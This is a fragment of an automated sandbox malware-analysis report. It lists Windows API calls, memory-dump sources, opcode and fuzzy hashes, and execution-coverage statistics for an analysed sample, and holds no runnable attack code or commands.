                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 083E4A2A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1651048756.00000000083E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083E0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_83e0000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: TextWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 530164218-0
                                                                                                                                                                                                                                                            • Opcode ID: e0f5157c05c97608ebfa6e2f24c055aa8ecd3b954f10c1928186f4043a0c1dbd
                                                                                                                                                                                                                                                            • Instruction ID: bb188e9381a7a81c6b085a611de66f7ea3021656859f0786acf31a46a1a36771
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0f5157c05c97608ebfa6e2f24c055aa8ecd3b954f10c1928186f4043a0c1dbd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E113BB6C006198FDB14CF9AD444BDEBBF4EB48320F10801AE864A7650D3349545CFA9
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 083E4A2A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1651048756.00000000083E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083E0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_83e0000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: TextWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 530164218-0
                                                                                                                                                                                                                                                            • Opcode ID: 4b4350435c33011ff87795606df95968fdef47cc42b47d6259287d6cb0f090c3
                                                                                                                                                                                                                                                            • Instruction ID: 78c2621f7e18d647161f88215737ec8dfedc4dd9eeb09ad2bfb333f27bb0b1de
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b4350435c33011ff87795606df95968fdef47cc42b47d6259287d6cb0f090c3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E21117B6C006598FDB24CF9AD444BDEFBF4EB88320F10801EE458A7640D378A545CF69
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,?,?,?,?), ref: 09B90670
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1652135566.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9b90000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessagePeek
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2222842502-0
                                                                                                                                                                                                                                                            • Opcode ID: dac75c6702763cb226ae337cdb0dc8f118fe163f1e678a9f77ada774da6e3b7b
                                                                                                                                                                                                                                                            • Instruction ID: d90be5a966304c3ee95da05b81671c2e636f8b96360ad1877e0640724a20ea73
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dac75c6702763cb226ae337cdb0dc8f118fe163f1e678a9f77ada774da6e3b7b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F11F6B6C102499FDB10CF9AD844BDEBBF8FB48320F10842AE958A3251C378A544CFA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 09B9093D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1652135566.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9b90000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                                                                                                                                            • Opcode ID: 8dc245e9d23becbd152c76ea96d5206acf98c2609f2c553f466f0b1d415a3e8c
                                                                                                                                                                                                                                                            • Instruction ID: 451f16d8b6c9ed3c4e4d27c392984a14a4225084b5ad2a5f4796e103f853822f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8dc245e9d23becbd152c76ea96d5206acf98c2609f2c553f466f0b1d415a3e8c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C911E2B68102499FDB10DF9AD844BDEBBF8EB48320F10842AE958A3240C378A544CFA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1652135566.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9b90000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DispatchMessage
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2061451462-0
                                                                                                                                                                                                                                                            • Opcode ID: c6c18d89248c3d8da4842e0ab72f44672183fe7709f01bb85f0ca9b1ec658bd2
                                                                                                                                                                                                                                                            • Instruction ID: 3e07a495093c1eb30e4c9706eba9353b1cf44890b3302baa4aa578feb9e58e76
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6c18d89248c3d8da4842e0ab72f44672183fe7709f01bb85f0ca9b1ec658bd2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA1140B1C147898FCB20CF9AD844BCEBBF0EB48320F10846AD458A7251D338A505CFA6
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 09B9C938
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1652135566.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9b90000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                                                                                                                                            • Opcode ID: 5133f8dfee58c608982a0d96d3b39f2a495543a4404600cb646f3196cf7021f9
                                                                                                                                                                                                                                                            • Instruction ID: 34a324a8505c6e798c0c234899eac6b26d8067c55b72ea4900ef80becc41729b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5133f8dfee58c608982a0d96d3b39f2a495543a4404600cb646f3196cf7021f9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC1146B18103599FDB21CF89C849BDEBFF0EB08324F20845AE598A7681C375A944CF95
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 083E96DD
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1651048756.00000000083E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083E0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_83e0000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessagePost
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                                                                                                                                            • Opcode ID: d03d65171e154b07478ba7c85dadce0391f02fc6be09d732a66dbd1a7ba873f6
                                                                                                                                                                                                                                                            • Instruction ID: e5fed42d66be5fd91bae65e8d59424407378854fca28b97ff3a172c6b9ebfabc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d03d65171e154b07478ba7c85dadce0391f02fc6be09d732a66dbd1a7ba873f6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 001125B58003198FDB10CF9AC845BEEBBF8FB48320F10841AE954A3250C378A944CFA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 083E4F55
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1651048756.00000000083E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083E0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_83e0000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessagePost
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                                                                                                                                            • Opcode ID: 5034d01d4fc67f125a03a7437480aa02899dd84e24cdea3722f9f62eb5a7aca4
                                                                                                                                                                                                                                                            • Instruction ID: a250014c9f015f5318831351d7589752cba8dbf91a7377ccc1e0413481fe7381
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5034d01d4fc67f125a03a7437480aa02899dd84e24cdea3722f9f62eb5a7aca4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 931133B68003588FDB20DF9AC885BDEBBF8FB48324F10841AE458A7240C375A945CFA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 09B9C938
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1652135566.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9b90000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                                                                                                                                            • Opcode ID: 0e70d5219bcdeb0fd698cc3ab92be934f70f66b4bf579023c32fcf436bc96ac2
                                                                                                                                                                                                                                                            • Instruction ID: 43c4373aa8e7aad5d29419e89d0d5198598b465bc1395669e3100226f6af7cb9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e70d5219bcdeb0fd698cc3ab92be934f70f66b4bf579023c32fcf436bc96ac2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 991116B58203499FDB20CF99C849BDEBFF4FB48324F20845AE958A7240C375A944CFA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 083EB115
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1651048756.00000000083E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083E0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_83e0000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Initialize
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                                                                                                                                            • Opcode ID: b728532515b563d03740551925d2d683af645af3b093c44bb1fa9ec663cdc611
                                                                                                                                                                                                                                                            • Instruction ID: bd447a81975f3db9328b214f693f82f062d77ba3df3ff480b3478b92c146900c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b728532515b563d03740551925d2d683af645af3b093c44bb1fa9ec663cdc611
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A11F2B58002588FDB20DF9AD888BDEFBF4EB48224F10845AD558A7740C379A945CFA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0242B046
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1648230286.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2420000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                                                                                                            • Opcode ID: 90426bb7181997e1a4a23b7b8efa3cc0f59c3729fb49e40ee2ae667d33347508
                                                                                                                                                                                                                                                            • Instruction ID: 82de20f4146fc788a1e1ba14bd3a73fa65f79a76c7b46d6b26a30e843c4df61b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90426bb7181997e1a4a23b7b8efa3cc0f59c3729fb49e40ee2ae667d33347508
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0011FDB6C003598FCB20CF9AC844B9EFBF4FB88214F10841AD428A7610C379A549CFA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 083EB115
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1651048756.00000000083E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083E0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_83e0000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Initialize
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                                                                                                                                            • Opcode ID: 06c606218cd027e8f41867491341e12f3cb2b695cb8ca3eb73d3fc228b2303ae
                                                                                                                                                                                                                                                            • Instruction ID: 9b519eed326abe5e634e1c3250a2cbd5bf4f98d6904769672e49684de44d5401
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06c606218cd027e8f41867491341e12f3cb2b695cb8ca3eb73d3fc228b2303ae
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6411F2B58003598FDB20DF9AC444B9EFBF8EB48224F20845AE518B7750D379A944CFA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 083E4F55
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1651048756.00000000083E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083E0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_83e0000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessagePost
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                                                                                                                                            • Opcode ID: c0925f6d5990466ac6921ef1b21c3f5fbb91682984955ccf65a6cb961c7700c9
                                                                                                                                                                                                                                                            • Instruction ID: 3e497848bf179d6cfece37be1cc231d3470d6677295552ef2c74b3709314524f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0925f6d5990466ac6921ef1b21c3f5fbb91682984955ccf65a6cb961c7700c9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 031100B58003599FDB20CF9AC884BDEBBF8FB48320F10841AE518A7640C379A944CFA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1652135566.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9b90000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DispatchMessage
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2061451462-0
                                                                                                                                                                                                                                                            • Opcode ID: 455020ea3ebb326ae728a701b52ed442704f29f960510b6611ab69aba0677dc9
                                                                                                                                                                                                                                                            • Instruction ID: ebd83109b94d002f7f11f5758830a1d12524835b15b8ec6324da4ee811376119
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 455020ea3ebb326ae728a701b52ed442704f29f960510b6611ab69aba0677dc9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49110DB5C146498FCB20DF9AD844BDEFBF4EB48324F10846AE418A3710C378A544CFA9
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1647472090.000000000064D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0064D000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_64d000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 3698b2a013091a96a5db852916ce4ec0e63074f8718018fb4cb802859ae78977
                                                                                                                                                                                                                                                            • Instruction ID: 0bd06d015b0c5a7e6fff7962ecb5f20236ff0cc08c186d40f9fd7d9fde97cdbd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3698b2a013091a96a5db852916ce4ec0e63074f8718018fb4cb802859ae78977
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65212871904204EFDB15DF10D9C0B56BBA6FB94324F20C56DE9090F356C336E856CAA2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1647569751.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_65d000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: db5eaddd4400cc3210361cd8735d60f10eb7752864d0c01f69a82ab60b10899c
                                                                                                                                                                                                                                                            • Instruction ID: f60c980ce31afe12aa2dd28d6f7bdc5b3099365b7cf600c50450504a6d2620ad
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db5eaddd4400cc3210361cd8735d60f10eb7752864d0c01f69a82ab60b10899c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3421D071904300AFDB25DF20D9C0B26BBA6FB84315F20C56DEE094B392C336D94ACA62
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1647569751.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_65d000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 9653473488c2749b1f1463ebdf322533cbd4919b05e51de5f029b67300e6ac69
                                                                                                                                                                                                                                                            • Instruction ID: 9ea026cfaa15894e336c5e9eb6e99db49dc530ba033a3befb89a21332f202f44
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9653473488c2749b1f1463ebdf322533cbd4919b05e51de5f029b67300e6ac69
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4221D071604200EFDB24DF20D9C4B16BBA6EB84315F20C569EC4A4B3D6C33AD84BCA62
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1647569751.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_65d000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: e5a57026d43b680ec9dd7fa9ba7a83c9f897029d889834145c31536371e0ebe1
                                                                                                                                                                                                                                                            • Instruction ID: 7c5e2a8043be0f31beb7956f5a960cb990edaa1774f441d2523e4835afc17acc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5a57026d43b680ec9dd7fa9ba7a83c9f897029d889834145c31536371e0ebe1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD217F755083809FCB12CF24D994B15BF71EB46314F28C5EAD8498F6A7C33A980ACB62
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1647472090.000000000064D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0064D000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_64d000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                                                                                                                                                                                                                            • Instruction ID: 6f65d62495820f4b836915711fd7a422f2f3f2bfca26ba980b40ba65b5c8d152
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA11D376904240DFCB15CF10D5C4B56BFB2FB94324F24C6A9D9090B756C33AE856CBA1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1647569751.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_65d000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                                                                                                                                                                                            • Instruction ID: dca880345e3d918f63455a86a1e27c097868340dc79b70c2a21f19f4cabc4756
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6511BB75504280DFCB21CF10D5C4B15BBA2FB84314F24C6ADDD494B796C33AD84ACB61
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1647472090.000000000064D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0064D000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_64d000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 4f4f390b9b38bb889f3112c70d814047090a6bf0e9503ebffc932c480e5c7624
                                                                                                                                                                                                                                                            • Instruction ID: 5fab7b2ceaa21014b63ccc2e67e6e30f7bb62bd2007d1b2f370c48169a051c43
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f4f390b9b38bb889f3112c70d814047090a6bf0e9503ebffc932c480e5c7624
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2301A771908344ABE7205A25CDC47A6BBD9EF41364F14855AED094F282C2789841CAB2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1647472090.000000000064D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0064D000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_64d000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 1441638b619e609f8b9370e6f4a71dff1851a0e0c5c97d26a8082063c2211594
                                                                                                                                                                                                                                                            • Instruction ID: e1573894f2457f0e837d28acc67ca215ec55641228710404e477357c31bc7aac
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1441638b619e609f8b9370e6f4a71dff1851a0e0c5c97d26a8082063c2211594
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89F062724043449EE7248E16D984BA6FBE8EB91774F18C59AED085F382C2799C44CB71
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000001), ref: 09B99535
                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000002), ref: 09B9957A
                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000004), ref: 09B995BF
                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000005), ref: 09B99604
                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000006), ref: 09B99649
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1652135566.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9b90000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: State
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1649606143-0
                                                                                                                                                                                                                                                            • Opcode ID: f8d3dc2338d49f79f6901e60e86c6801f419210bc7dcc31e3a04d3639a925ff7
                                                                                                                                                                                                                                                            • Instruction ID: dac66b2b570e59d18461be071abf6a35ba539bdd289b4f1fa13b5375e5aef3c1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8d3dc2338d49f79f6901e60e86c6801f419210bc7dcc31e3a04d3639a925ff7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1541C571C257458FEF61CF69C9483AFBFF4AB04318F24406DE448AB291C3789585CBA6
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1648230286.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2420000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 0370b6461dcc41cb5bbe4ab78fd0d070bb68da979f08bf3484bc84e2f6bc2e78
                                                                                                                                                                                                                                                            • Instruction ID: c4aa95162349d6a54dbc7776c5abdda9cfbb89200af50e46c2bb1a02ca22cbc0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0370b6461dcc41cb5bbe4ab78fd0d070bb68da979f08bf3484bc84e2f6bc2e78
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8A17E32E00225CFCF15DFB6C94059EB7B2FF85300B95456AE805AB265DB75E94ACF80

                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                            Execution Coverage:3.6%
                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:69.7%
                                                                                                                                                                                                                                                            Signature Coverage:4.8%
                                                                                                                                                                                                                                                            Total number of Nodes:330
                                                                                                                                                                                                                                                            Total number of Limit Nodes:26
